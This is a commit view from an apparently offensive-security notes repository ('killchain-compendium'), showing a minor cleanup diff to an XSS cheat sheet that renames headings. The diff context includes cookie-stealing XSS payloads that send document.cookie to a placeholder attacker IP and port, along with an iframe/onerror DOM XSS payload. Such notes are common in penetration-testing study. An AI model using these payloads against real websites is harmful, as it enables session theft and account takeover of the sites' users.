whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

cleanup

This commit is contained in:
gurkenhabicht 2024-07-07 21:26:09 +02:00
parent a5459ae447
commit bb4cd3b7d1
1 changed files with 2 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
Exploits/Web/XSS.md
View File

@ -35,7 +35,6 @@ Open nc port and collect cookies
```javascript ```javascript
<script>document.location='http://<attacker-IP>:<attacker-Port>/XSS/grabber.php?c='+document.cookie</script> <script>document.location='http://<attacker-IP>:<attacker-Port>/XSS/grabber.php?c='+document.cookie</script>
<script>var i=new Image;i.src="http://<attacker-IP>:<attacker-Port>/?"+document.cookie;</script> <script>var i=new Image;i.src="http://<attacker-IP>:<attacker-Port>/?"+document.cookie;</script>
``` ```
## Reflected XSS ## Reflected XSS
@ -48,7 +47,7 @@ into clicking a URL to execute their malicious payload.
* URL parameters inside GET queries * URL parameters inside GET queries
* File paths * File paths
### Usage ### Reflected XSS Usage
As script inside parameter As script inside parameter
@ -106,7 +105,7 @@ page.
<iframe src="https://vulnerable-website.com#" onload="this.src+='<img src=1 onerror=alert(1)>'"> <iframe src="https://vulnerable-website.com#" onload="this.src+='<img src=1 onerror=alert(1)>'">
``` ```
### Usage ### DOM based Usage
Find the sub-object inside the document through ending the string and execute a Find the sub-object inside the document through ending the string and execute a
javascript alert when hovering over the sub-object. javascript alert when hovering over the sub-object.